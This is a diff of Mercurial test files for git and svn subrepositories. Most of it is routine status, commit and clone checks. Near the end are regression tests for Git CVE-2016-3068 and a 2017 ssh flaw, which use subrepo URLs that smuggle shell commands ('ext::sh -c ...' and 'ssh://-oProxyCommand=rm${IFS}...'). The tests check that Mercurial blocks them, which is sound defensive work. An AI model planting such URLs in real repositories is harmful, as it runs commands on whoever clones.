1033 ? s/foobar.orig
1033 ? s/foobar.orig
1034 $ hg st --subrepos s --all
1034 $ hg st --subrepos s --all
1035 A s/.gitignore
1035 A s/.gitignore
1036 ? s/barfoo
1036 ? s/barfoo
1037 ? s/c.c
1037 ? s/c.c
1038 ? s/cpp.cpp
1038 ? s/cpp.cpp
1039 ? s/foobar.orig
1039 ? s/foobar.orig
1040 I s/snake.python
1040 I s/snake.python
1041 C s/f
1041 C s/f
1042 C s/foobar
1042 C s/foobar
1043 C s/g
1043 C s/g
1044 $ hg add --subrepos "glob:**.python"
1044 $ hg add --subrepos "glob:**.python"
1045 $ hg st --subrepos s
1045 $ hg st --subrepos s
1046 A s/.gitignore
1046 A s/.gitignore
1047 ? s/barfoo
1047 ? s/barfoo
1048 ? s/c.c
1048 ? s/c.c
1049 ? s/cpp.cpp
1049 ? s/cpp.cpp
1050 ? s/foobar.orig
1050 ? s/foobar.orig
1051 $ hg add --subrepos s/snake.python
1051 $ hg add --subrepos s/snake.python
1052 $ hg st --subrepos s
1052 $ hg st --subrepos s
1053 A s/.gitignore
1053 A s/.gitignore
1054 A s/snake.python
1054 A s/snake.python
1055 ? s/barfoo
1055 ? s/barfoo
1056 ? s/c.c
1056 ? s/c.c
1057 ? s/cpp.cpp
1057 ? s/cpp.cpp
1058 ? s/foobar.orig
1058 ? s/foobar.orig
1059
1059
1060 correctly do a dry run
1060 correctly do a dry run
1061 $ hg add --subrepos s --dry-run
1061 $ hg add --subrepos s --dry-run
1062 adding s/barfoo (glob)
1062 adding s/barfoo (glob)
1063 adding s/c.c (glob)
1063 adding s/c.c (glob)
1064 adding s/cpp.cpp (glob)
1064 adding s/cpp.cpp (glob)
1065 adding s/foobar.orig (glob)
1065 adding s/foobar.orig (glob)
1066 $ hg st --subrepos s
1066 $ hg st --subrepos s
1067 A s/.gitignore
1067 A s/.gitignore
1068 A s/snake.python
1068 A s/snake.python
1069 ? s/barfoo
1069 ? s/barfoo
1070 ? s/c.c
1070 ? s/c.c
1071 ? s/cpp.cpp
1071 ? s/cpp.cpp
1072 ? s/foobar.orig
1072 ? s/foobar.orig
1073
1073
1074 error given when adding an already tracked file
1074 error given when adding an already tracked file
1075 $ hg add s/.gitignore
1075 $ hg add s/.gitignore
1076 s/.gitignore already tracked!
1076 s/.gitignore already tracked!
1077 [1]
1077 [1]
1078 $ hg add s/g
1078 $ hg add s/g
1079 s/g already tracked!
1079 s/g already tracked!
1080 [1]
1080 [1]
1081
1081
1082 removed files can be re-added
1082 removed files can be re-added
1083 removing files using 'rm' or 'git rm' has the same effect,
1083 removing files using 'rm' or 'git rm' has the same effect,
1084 since we ignore the staging area
1084 since we ignore the staging area
1085 $ hg ci --subrepos -m 'snake'
1085 $ hg ci --subrepos -m 'snake'
1086 committing subrepository s
1086 committing subrepository s
1087 $ cd s
1087 $ cd s
1088 $ rm snake.python
1088 $ rm snake.python
1089 (remove leftover .hg so Mercurial doesn't look for a root here)
1089 (remove leftover .hg so Mercurial doesn't look for a root here)
1090 $ rm -rf .hg
1090 $ rm -rf .hg
1091 $ hg status --subrepos --all .
1091 $ hg status --subrepos --all .
1092 R snake.python
1092 R snake.python
1093 ? barfoo
1093 ? barfoo
1094 ? c.c
1094 ? c.c
1095 ? cpp.cpp
1095 ? cpp.cpp
1096 ? foobar.orig
1096 ? foobar.orig
1097 C .gitignore
1097 C .gitignore
1098 C f
1098 C f
1099 C foobar
1099 C foobar
1100 C g
1100 C g
1101 $ git rm snake.python
1101 $ git rm snake.python
1102 rm 'snake.python'
1102 rm 'snake.python'
1103 $ hg status --subrepos --all .
1103 $ hg status --subrepos --all .
1104 R snake.python
1104 R snake.python
1105 ? barfoo
1105 ? barfoo
1106 ? c.c
1106 ? c.c
1107 ? cpp.cpp
1107 ? cpp.cpp
1108 ? foobar.orig
1108 ? foobar.orig
1109 C .gitignore
1109 C .gitignore
1110 C f
1110 C f
1111 C foobar
1111 C foobar
1112 C g
1112 C g
1113 $ touch snake.python
1113 $ touch snake.python
1114 $ cd ..
1114 $ cd ..
1115 $ hg add s/snake.python
1115 $ hg add s/snake.python
1116 $ hg status -S
1116 $ hg status -S
1117 M s/snake.python
1117 M s/snake.python
1118 ? .hgignore
1118 ? .hgignore
1119 ? s/barfoo
1119 ? s/barfoo
1120 ? s/c.c
1120 ? s/c.c
1121 ? s/cpp.cpp
1121 ? s/cpp.cpp
1122 ? s/foobar.orig
1122 ? s/foobar.orig
1123 $ hg revert --all -q
1123 $ hg revert --all -q
1124
1124
1125 make sure we show changed files, rather than changed subtrees
1125 make sure we show changed files, rather than changed subtrees
1126 $ mkdir s/foo
1126 $ mkdir s/foo
1127 $ touch s/foo/bwuh
1127 $ touch s/foo/bwuh
1128 $ hg add s/foo/bwuh
1128 $ hg add s/foo/bwuh
1129 $ hg commit -S -m "add bwuh"
1129 $ hg commit -S -m "add bwuh"
1130 committing subrepository s
1130 committing subrepository s
1131 $ hg status -S --change .
1131 $ hg status -S --change .
1132 M .hgsubstate
1132 M .hgsubstate
1133 A s/foo/bwuh
1133 A s/foo/bwuh
1134 ? s/barfoo
1134 ? s/barfoo
1135 ? s/c.c
1135 ? s/c.c
1136 ? s/cpp.cpp
1136 ? s/cpp.cpp
1137 ? s/foobar.orig
1137 ? s/foobar.orig
1138 ? s/snake.python.orig
1138 ? s/snake.python.orig
1139
1139
1140 #if git19
1140 #if git19
1141
1141
1142 test for Git CVE-2016-3068
1142 test for Git CVE-2016-3068
1143 $ hg init malicious-subrepository
1143 $ hg init malicious-subrepository
1144 $ cd malicious-subrepository
1144 $ cd malicious-subrepository
1145 $ echo "s = [git]ext::sh -c echo% pwned:% \$PWNED_MSG% >pwned.txt" > .hgsub
1145 $ echo "s = [git]ext::sh -c echo% pwned:% \$PWNED_MSG% >pwned.txt" > .hgsub
1146 $ git init s
1146 $ git init s
1147 Initialized empty Git repository in $TESTTMP/tc/malicious-subrepository/s/.git/
1147 Initialized empty Git repository in $TESTTMP/tc/malicious-subrepository/s/.git/
1148 $ cd s
1148 $ cd s
1149 $ git commit --allow-empty -m 'empty'
1149 $ git commit --allow-empty -m 'empty'
1150 [master (root-commit) 153f934] empty
1150 [master (root-commit) 153f934] empty
1151 $ cd ..
1151 $ cd ..
1152 $ hg add .hgsub
1152 $ hg add .hgsub
1153 $ hg commit -m "add subrepo"
1153 $ hg commit -m "add subrepo"
1154 $ cd ..
1154 $ cd ..
1155 $ rm -f pwned.txt
1155 $ rm -f pwned.txt
1156 $ unset GIT_ALLOW_PROTOCOL
1156 $ unset GIT_ALLOW_PROTOCOL
1157 $ PWNED_MSG="your git is too old or mercurial has regressed" hg clone \
1157 $ PWNED_MSG="your git is too old or mercurial has regressed" hg clone \
1158 > malicious-subrepository malicious-subrepository-protected
1158 > malicious-subrepository malicious-subrepository-protected
1159 Cloning into '$TESTTMP/tc/malicious-subrepository-protected/s'... (glob)
1159 Cloning into '$TESTTMP/tc/malicious-subrepository-protected/s'... (glob)
1160 fatal: transport 'ext' not allowed
1160 fatal: transport 'ext' not allowed
1161 updating to branch default
1161 updating to branch default
1162 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1162 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1163 abort: git clone error 128 in s (in subrepository "s")
1163 abort: git clone error 128 in s (in subrepository "s")
1164 [255]
1164 [255]
1165 $ f -Dq pwned.txt
1165 $ f -Dq pwned.txt
1166 pwned.txt: file not found
1166 pwned.txt: file not found
1167
1167
1168 whitelisting of ext should be respected (that's the git submodule behaviour)
1168 whitelisting of ext should be respected (that's the git submodule behaviour)
1169 $ rm -f pwned.txt
1169 $ rm -f pwned.txt
1170 $ env GIT_ALLOW_PROTOCOL=ext PWNED_MSG="you asked for it" hg clone \
1170 $ env GIT_ALLOW_PROTOCOL=ext PWNED_MSG="you asked for it" hg clone \
1171 > malicious-subrepository malicious-subrepository-clone-allowed
1171 > malicious-subrepository malicious-subrepository-clone-allowed
1172 Cloning into '$TESTTMP/tc/malicious-subrepository-clone-allowed/s'... (glob)
1172 Cloning into '$TESTTMP/tc/malicious-subrepository-clone-allowed/s'... (glob)
1173 fatal: Could not read from remote repository.
1173 fatal: Could not read from remote repository.
1174
1174
1175 Please make sure you have the correct access rights
1175 Please make sure you have the correct access rights
1176 and the repository exists.
1176 and the repository exists.
1177 updating to branch default
1177 updating to branch default
1178 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1178 cloning subrepo s from ext::sh -c echo% pwned:% $PWNED_MSG% >pwned.txt
1179 abort: git clone error 128 in s (in subrepository "s")
1179 abort: git clone error 128 in s (in subrepository "s")
1180 [255]
1180 [255]
1181 $ f -Dq pwned.txt
1181 $ f -Dq pwned.txt
1182 pwned: you asked for it
1182 pwned: you asked for it
1183
1183
1184 #endif
1184 #endif
1185
1186 test for ssh exploit with git subrepos 2017-07-25
1187
1188 $ hg init malicious-proxycommand
1189 $ cd malicious-proxycommand
1190 $ echo 's = [git]ssh://-oProxyCommand=rm${IFS}non-existent/path' > .hgsub
1191 $ git init s
1192 Initialized empty Git repository in $TESTTMP/tc/malicious-proxycommand/s/.git/
1193 $ cd s
1194 $ git commit --allow-empty -m 'empty'
1195 [master (root-commit) 153f934] empty
1196 $ cd ..
1197 $ hg add .hgsub
1198 $ hg ci -m 'add subrepo'
1199 $ cd ..
1200 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1201 updating to branch default
1202 abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepository "s")
1203 [255]
1204
1205 also check that a percent encoded '-' (%2D) doesn't work
1206
1207 $ cd malicious-proxycommand
1208 $ echo 's = [git]ssh://%2DoProxyCommand=rm${IFS}non-existent/path' > .hgsub
1209 $ hg ci -m 'change url to percent encoded'
1210 $ cd ..
1211 $ rm -r malicious-proxycommand-clone
1212 $ hg clone malicious-proxycommand malicious-proxycommand-clone
1213 updating to branch default
1214 abort: potentially unsafe url: 'ssh://-oProxyCommand=rm${IFS}non-existent/path' (in subrepository "s")
1215 [255]
@@ -1,641 +1,681 b''
1 #require svn15
1 #require svn15
2
2
3 $ SVNREPOPATH=`pwd`/svn-repo
3 $ SVNREPOPATH=`pwd`/svn-repo
4 #if windows
4 #if windows
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
5 $ SVNREPOURL=file:///`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
6 #else
6 #else
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
7 $ SVNREPOURL=file://`$PYTHON -c "import urllib, sys; sys.stdout.write(urllib.quote(sys.argv[1]))" "$SVNREPOPATH"`
8 #endif
8 #endif
9
9
10 $ filter_svn_output () {
10 $ filter_svn_output () {
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
11 > egrep -v 'Committing|Transmitting|Updating|(^$)' || true
12 > }
12 > }
13
13
14 create subversion repo
14 create subversion repo
15
15
16 $ WCROOT="`pwd`/svn-wc"
16 $ WCROOT="`pwd`/svn-wc"
17 $ svnadmin create svn-repo
17 $ svnadmin create svn-repo
18 $ svn co "$SVNREPOURL" svn-wc
18 $ svn co "$SVNREPOURL" svn-wc
19 Checked out revision 0.
19 Checked out revision 0.
20 $ cd svn-wc
20 $ cd svn-wc
21 $ mkdir src
21 $ mkdir src
22 $ echo alpha > src/alpha
22 $ echo alpha > src/alpha
23 $ svn add src
23 $ svn add src
24 A src
24 A src
25 A src/alpha (glob)
25 A src/alpha (glob)
26 $ mkdir externals
26 $ mkdir externals
27 $ echo other > externals/other
27 $ echo other > externals/other
28 $ svn add externals
28 $ svn add externals
29 A externals
29 A externals
30 A externals/other (glob)
30 A externals/other (glob)
31 $ svn ci -qm 'Add alpha'
31 $ svn ci -qm 'Add alpha'
32 $ svn up -q
32 $ svn up -q
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
33 $ echo "externals -r1 $SVNREPOURL/externals" > extdef
34 $ svn propset -F extdef svn:externals src
34 $ svn propset -F extdef svn:externals src
35 property 'svn:externals' set on 'src'
35 property 'svn:externals' set on 'src'
36 $ svn ci -qm 'Setting externals'
36 $ svn ci -qm 'Setting externals'
37 $ cd ..
37 $ cd ..
38
38
39 create hg repo
39 create hg repo
40
40
41 $ mkdir sub
41 $ mkdir sub
42 $ cd sub
42 $ cd sub
43 $ hg init t
43 $ hg init t
44 $ cd t
44 $ cd t
45
45
46 first revision, no sub
46 first revision, no sub
47
47
48 $ echo a > a
48 $ echo a > a
49 $ hg ci -Am0
49 $ hg ci -Am0
50 adding a
50 adding a
51
51
52 add first svn sub with leading whitespaces
52 add first svn sub with leading whitespaces
53
53
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
54 $ echo "s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
55 $ echo "subdir/s = [svn] $SVNREPOURL/src" >> .hgsub
56 $ svn co --quiet "$SVNREPOURL"/src s
56 $ svn co --quiet "$SVNREPOURL"/src s
57 $ mkdir subdir
57 $ mkdir subdir
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
58 $ svn co --quiet "$SVNREPOURL"/src subdir/s
59 $ hg add .hgsub
59 $ hg add .hgsub
60 $ hg ci -m1
60 $ hg ci -m1
61
61
62 make sure we avoid empty commits (issue2445)
62 make sure we avoid empty commits (issue2445)
63
63
64 $ hg sum
64 $ hg sum
65 parent: 1:* tip (glob)
65 parent: 1:* tip (glob)
66 1
66 1
67 branch: default
67 branch: default
68 commit: (clean)
68 commit: (clean)
69 update: (current)
69 update: (current)
70 phases: 2 draft
70 phases: 2 draft
71 $ hg ci -moops
71 $ hg ci -moops
72 nothing changed
72 nothing changed
73 [1]
73 [1]
74
74
75 debugsub
75 debugsub
76
76
77 $ hg debugsub
77 $ hg debugsub
78 path s
78 path s
79 source file://*/svn-repo/src (glob)
79 source file://*/svn-repo/src (glob)
80 revision 2
80 revision 2
81 path subdir/s
81 path subdir/s
82 source file://*/svn-repo/src (glob)
82 source file://*/svn-repo/src (glob)
83 revision 2
83 revision 2
84
84
85 change file in svn and hg, commit
85 change file in svn and hg, commit
86
86
87 $ echo a >> a
87 $ echo a >> a
88 $ echo alpha >> s/alpha
88 $ echo alpha >> s/alpha
89 $ hg sum
89 $ hg sum
90 parent: 1:* tip (glob)
90 parent: 1:* tip (glob)
91 1
91 1
92 branch: default
92 branch: default
93 commit: 1 modified, 1 subrepos
93 commit: 1 modified, 1 subrepos
94 update: (current)
94 update: (current)
95 phases: 2 draft
95 phases: 2 draft
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
96 $ hg commit --subrepos -m 'Message!' | filter_svn_output
97 committing subrepository s
97 committing subrepository s
98 Sending*s/alpha (glob)
98 Sending*s/alpha (glob)
99 Committed revision 3.
99 Committed revision 3.
100 Fetching external item into '*s/externals'* (glob)
100 Fetching external item into '*s/externals'* (glob)
101 External at revision 1.
101 External at revision 1.
102 At revision 3.
102 At revision 3.
103 $ hg debugsub
103 $ hg debugsub
104 path s
104 path s
105 source file://*/svn-repo/src (glob)
105 source file://*/svn-repo/src (glob)
106 revision 3
106 revision 3
107 path subdir/s
107 path subdir/s
108 source file://*/svn-repo/src (glob)
108 source file://*/svn-repo/src (glob)
109 revision 2
109 revision 2
110
110
111 missing svn file, commit should fail
111 missing svn file, commit should fail
112
112
113 $ rm s/alpha
113 $ rm s/alpha
114 $ hg commit --subrepos -m 'abort on missing file'
114 $ hg commit --subrepos -m 'abort on missing file'
115 committing subrepository s
115 committing subrepository s
116 abort: cannot commit missing svn entries (in subrepository "s")
116 abort: cannot commit missing svn entries (in subrepository "s")
117 [255]
117 [255]
118 $ svn revert s/alpha > /dev/null
118 $ svn revert s/alpha > /dev/null
119
119
120 add an unrelated revision in svn and update the subrepo to without
120 add an unrelated revision in svn and update the subrepo to without
121 bringing any changes.
121 bringing any changes.
122
122
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
123 $ svn mkdir "$SVNREPOURL/unrelated" -qm 'create unrelated'
124 $ svn up -q s
124 $ svn up -q s
125 $ hg sum
125 $ hg sum
126 parent: 2:* tip (glob)
126 parent: 2:* tip (glob)
127 Message!
127 Message!
128 branch: default
128 branch: default
129 commit: (clean)
129 commit: (clean)
130 update: (current)
130 update: (current)
131 phases: 3 draft
131 phases: 3 draft
132
132
133 $ echo a > s/a
133 $ echo a > s/a
134
134
135 should be empty despite change to s/a
135 should be empty despite change to s/a
136
136
137 $ hg st
137 $ hg st
138
138
139 add a commit from svn
139 add a commit from svn
140
140
141 $ cd "$WCROOT/src"
141 $ cd "$WCROOT/src"
142 $ svn up -q
142 $ svn up -q
143 $ echo xyz >> alpha
143 $ echo xyz >> alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
144 $ svn propset svn:mime-type 'text/xml' alpha
145 property 'svn:mime-type' set on 'alpha'
145 property 'svn:mime-type' set on 'alpha'
146 $ svn ci -qm 'amend a from svn'
146 $ svn ci -qm 'amend a from svn'
147 $ cd ../../sub/t
147 $ cd ../../sub/t
148
148
149 this commit from hg will fail
149 this commit from hg will fail
150
150
151 $ echo zzz >> s/alpha
151 $ echo zzz >> s/alpha
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
152 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
153 committing subrepository s
153 committing subrepository s
154 abort: svn:*Commit failed (details follow): (glob)
154 abort: svn:*Commit failed (details follow): (glob)
155 [255]
155 [255]
156 $ svn revert -q s/alpha
156 $ svn revert -q s/alpha
157
157
158 this commit fails because of meta changes
158 this commit fails because of meta changes
159
159
160 $ svn propset svn:mime-type 'text/html' s/alpha
160 $ svn propset svn:mime-type 'text/html' s/alpha
161 property 'svn:mime-type' set on 's/alpha' (glob)
161 property 'svn:mime-type' set on 's/alpha' (glob)
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
162 $ (hg ci --subrepos -m 'amend alpha from hg' 2>&1; echo "[$?]") | grep -vi 'out of date'
163 committing subrepository s
163 committing subrepository s
164 abort: svn:*Commit failed (details follow): (glob)
164 abort: svn:*Commit failed (details follow): (glob)
165 [255]
165 [255]
166 $ svn revert -q s/alpha
166 $ svn revert -q s/alpha
167
167
168 this commit fails because of externals changes
168 this commit fails because of externals changes
169
169
170 $ echo zzz > s/externals/other
170 $ echo zzz > s/externals/other
171 $ hg ci --subrepos -m 'amend externals from hg'
171 $ hg ci --subrepos -m 'amend externals from hg'
172 committing subrepository s
172 committing subrepository s
173 abort: cannot commit svn externals (in subrepository "s")
173 abort: cannot commit svn externals (in subrepository "s")
174 [255]
174 [255]
175 $ hg diff --subrepos -r 1:2 | grep -v diff
175 $ hg diff --subrepos -r 1:2 | grep -v diff
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
176 --- a/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
177 +++ b/.hgsubstate Thu Jan 01 00:00:00 1970 +0000
178 @@ -1,2 +1,2 @@
178 @@ -1,2 +1,2 @@
179 -2 s
179 -2 s
180 +3 s
180 +3 s
181 2 subdir/s
181 2 subdir/s
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
182 --- a/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
183 +++ b/a Thu Jan 01 00:00:00 1970 +0000
184 @@ -1,1 +1,2 @@
184 @@ -1,1 +1,2 @@
185 a
185 a
186 +a
186 +a
187 $ svn revert -q s/externals/other
187 $ svn revert -q s/externals/other
188
188
189 this commit fails because of externals meta changes
189 this commit fails because of externals meta changes
190
190
191 $ svn propset svn:mime-type 'text/html' s/externals/other
191 $ svn propset svn:mime-type 'text/html' s/externals/other
192 property 'svn:mime-type' set on 's/externals/other' (glob)
192 property 'svn:mime-type' set on 's/externals/other' (glob)
193 $ hg ci --subrepos -m 'amend externals from hg'
193 $ hg ci --subrepos -m 'amend externals from hg'
194 committing subrepository s
194 committing subrepository s
195 abort: cannot commit svn externals (in subrepository "s")
195 abort: cannot commit svn externals (in subrepository "s")
196 [255]
196 [255]
197 $ svn revert -q s/externals/other
197 $ svn revert -q s/externals/other
198
198
199 clone
199 clone
200
200
201 $ cd ..
201 $ cd ..
202 $ hg clone t tc
202 $ hg clone t tc
203 updating to branch default
203 updating to branch default
204 A tc/s/alpha (glob)
204 A tc/s/alpha (glob)
205 U tc/s (glob)
205 U tc/s (glob)
206
206
207 Fetching external item into 'tc/s/externals'* (glob)
207 Fetching external item into 'tc/s/externals'* (glob)
208 A tc/s/externals/other (glob)
208 A tc/s/externals/other (glob)
209 Checked out external at revision 1.
209 Checked out external at revision 1.
210
210
211 Checked out revision 3.
211 Checked out revision 3.
212 A tc/subdir/s/alpha (glob)
212 A tc/subdir/s/alpha (glob)
213 U tc/subdir/s (glob)
213 U tc/subdir/s (glob)
214
214
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
215 Fetching external item into 'tc/subdir/s/externals'* (glob)
216 A tc/subdir/s/externals/other (glob)
216 A tc/subdir/s/externals/other (glob)
217 Checked out external at revision 1.
217 Checked out external at revision 1.
218
218
219 Checked out revision 2.
219 Checked out revision 2.
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
220 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
221 $ cd tc
221 $ cd tc
222
222
223 debugsub in clone
223 debugsub in clone
224
224
225 $ hg debugsub
225 $ hg debugsub
226 path s
226 path s
227 source file://*/svn-repo/src (glob)
227 source file://*/svn-repo/src (glob)
228 revision 3
228 revision 3
229 path subdir/s
229 path subdir/s
230 source file://*/svn-repo/src (glob)
230 source file://*/svn-repo/src (glob)
231 revision 2
231 revision 2
232
232
233 verify subrepo is contained within the repo directory
233 verify subrepo is contained within the repo directory
234
234
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
235 $ $PYTHON -c "import os.path; print os.path.exists('s')"
236 True
236 True
237
237
238 update to nullrev (must delete the subrepo)
238 update to nullrev (must delete the subrepo)
239
239
240 $ hg up null
240 $ hg up null
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
241 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
242 $ ls
242 $ ls
243
243
244 Check hg update --clean
244 Check hg update --clean
245 $ cd "$TESTTMP/sub/t"
245 $ cd "$TESTTMP/sub/t"
246 $ cd s
246 $ cd s
247 $ echo c0 > alpha
247 $ echo c0 > alpha
248 $ echo c1 > f1
248 $ echo c1 > f1
249 $ echo c1 > f2
249 $ echo c1 > f2
250 $ svn add f1 -q
250 $ svn add f1 -q
251 $ svn status | sort
251 $ svn status | sort
252
252
253 ? * a (glob)
253 ? * a (glob)
254 ? * f2 (glob)
254 ? * f2 (glob)
255 A * f1 (glob)
255 A * f1 (glob)
256 M * alpha (glob)
256 M * alpha (glob)
257 Performing status on external item at 'externals'* (glob)
257 Performing status on external item at 'externals'* (glob)
258 X * externals (glob)
258 X * externals (glob)
259 $ cd ../..
259 $ cd ../..
260 $ hg -R t update -C
260 $ hg -R t update -C
261
261
262 Fetching external item into 't/s/externals'* (glob)
262 Fetching external item into 't/s/externals'* (glob)
263 Checked out external at revision 1.
263 Checked out external at revision 1.
264
264
265 Checked out revision 3.
265 Checked out revision 3.
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
266 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
267 $ cd t/s
267 $ cd t/s
268 $ svn status | sort
268 $ svn status | sort
269
269
270 ? * a (glob)
270 ? * a (glob)
271 ? * f1 (glob)
271 ? * f1 (glob)
272 ? * f2 (glob)
272 ? * f2 (glob)
273 Performing status on external item at 'externals'* (glob)
273 Performing status on external item at 'externals'* (glob)
274 X * externals (glob)
274 X * externals (glob)
275
275
276 Sticky subrepositories, no changes
276 Sticky subrepositories, no changes
277 $ cd "$TESTTMP/sub/t"
277 $ cd "$TESTTMP/sub/t"
278 $ hg id -n
278 $ hg id -n
279 2
279 2
280 $ cd s
280 $ cd s
281 $ svnversion
281 $ svnversion
282 3
282 3
283 $ cd ..
283 $ cd ..
284 $ hg update 1
284 $ hg update 1
285 U *s/alpha (glob)
285 U *s/alpha (glob)
286
286
287 Fetching external item into '*s/externals'* (glob)
287 Fetching external item into '*s/externals'* (glob)
288 Checked out external at revision 1.
288 Checked out external at revision 1.
289
289
290 Checked out revision 2.
290 Checked out revision 2.
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
291 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
292 $ hg id -n
292 $ hg id -n
293 1
293 1
294 $ cd s
294 $ cd s
295 $ svnversion
295 $ svnversion
296 2
296 2
297 $ cd ..
297 $ cd ..
298
298
299 Sticky subrepositories, file changes
299 Sticky subrepositories, file changes
300 $ touch s/f1
300 $ touch s/f1
301 $ cd s
301 $ cd s
302 $ svn add f1
302 $ svn add f1
303 A f1
303 A f1
304 $ cd ..
304 $ cd ..
305 $ hg id -n
305 $ hg id -n
306 1+
306 1+
307 $ cd s
307 $ cd s
308 $ svnversion
308 $ svnversion
309 2M
309 2M
310 $ cd ..
310 $ cd ..
311 $ hg update tip
311 $ hg update tip
312 subrepository s diverged (local revision: 2, remote revision: 3)
312 subrepository s diverged (local revision: 2, remote revision: 3)
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
313 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
314 subrepository sources for s differ
314 subrepository sources for s differ
315 use (l)ocal source (2) or (r)emote source (3)? l
315 use (l)ocal source (2) or (r)emote source (3)? l
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
316 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
317 $ hg id -n
317 $ hg id -n
318 2+
318 2+
319 $ cd s
319 $ cd s
320 $ svnversion
320 $ svnversion
321 2M
321 2M
322 $ cd ..
322 $ cd ..
323 $ hg update --clean tip
323 $ hg update --clean tip
324 U *s/alpha (glob)
324 U *s/alpha (glob)
325
325
326 Fetching external item into '*s/externals'* (glob)
326 Fetching external item into '*s/externals'* (glob)
327 Checked out external at revision 1.
327 Checked out external at revision 1.
328
328
329 Checked out revision 3.
329 Checked out revision 3.
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
330 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
331
331
332 Sticky subrepository, revision updates
332 Sticky subrepository, revision updates
333 $ hg id -n
333 $ hg id -n
334 2
334 2
335 $ cd s
335 $ cd s
336 $ svnversion
336 $ svnversion
337 3
337 3
338 $ cd ..
338 $ cd ..
339 $ cd s
339 $ cd s
340 $ svn update -qr 1
340 $ svn update -qr 1
341 $ cd ..
341 $ cd ..
342 $ hg update 1
342 $ hg update 1
343 subrepository s diverged (local revision: 3, remote revision: 2)
343 subrepository s diverged (local revision: 3, remote revision: 2)
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
344 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
345 subrepository sources for s differ (in checked out version)
345 subrepository sources for s differ (in checked out version)
346 use (l)ocal source (1) or (r)emote source (2)? l
346 use (l)ocal source (1) or (r)emote source (2)? l
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
347 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
348 $ hg id -n
348 $ hg id -n
349 1+
349 1+
350 $ cd s
350 $ cd s
351 $ svnversion
351 $ svnversion
352 1
352 1
353 $ cd ..
353 $ cd ..
354
354
355 Sticky subrepository, file changes and revision updates
355 Sticky subrepository, file changes and revision updates
356 $ touch s/f1
356 $ touch s/f1
357 $ cd s
357 $ cd s
358 $ svn add f1
358 $ svn add f1
359 A f1
359 A f1
360 $ svnversion
360 $ svnversion
361 1M
361 1M
362 $ cd ..
362 $ cd ..
363 $ hg id -n
363 $ hg id -n
364 1+
364 1+
365 $ hg update tip
365 $ hg update tip
366 subrepository s diverged (local revision: 3, remote revision: 3)
366 subrepository s diverged (local revision: 3, remote revision: 3)
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
367 (M)erge, keep (l)ocal [working copy] or keep (r)emote [destination]? m
368 subrepository sources for s differ
368 subrepository sources for s differ
369 use (l)ocal source (1) or (r)emote source (3)? l
369 use (l)ocal source (1) or (r)emote source (3)? l
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
370 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
371 $ hg id -n
371 $ hg id -n
372 2+
372 2+
373 $ cd s
373 $ cd s
374 $ svnversion
374 $ svnversion
375 1M
375 1M
376 $ cd ..
376 $ cd ..
377
377
378 Sticky repository, update --clean
378 Sticky repository, update --clean
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
379 $ hg update --clean tip | grep -v 's[/\]externals[/\]other'
380 U *s/alpha (glob)
380 U *s/alpha (glob)
381 U *s (glob)
381 U *s (glob)
382
382
383 Fetching external item into '*s/externals'* (glob)
383 Fetching external item into '*s/externals'* (glob)
384 Checked out external at revision 1.
384 Checked out external at revision 1.
385
385
386 Checked out revision 3.
386 Checked out revision 3.
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
388 $ hg id -n
388 $ hg id -n
389 2
389 2
390 $ cd s
390 $ cd s
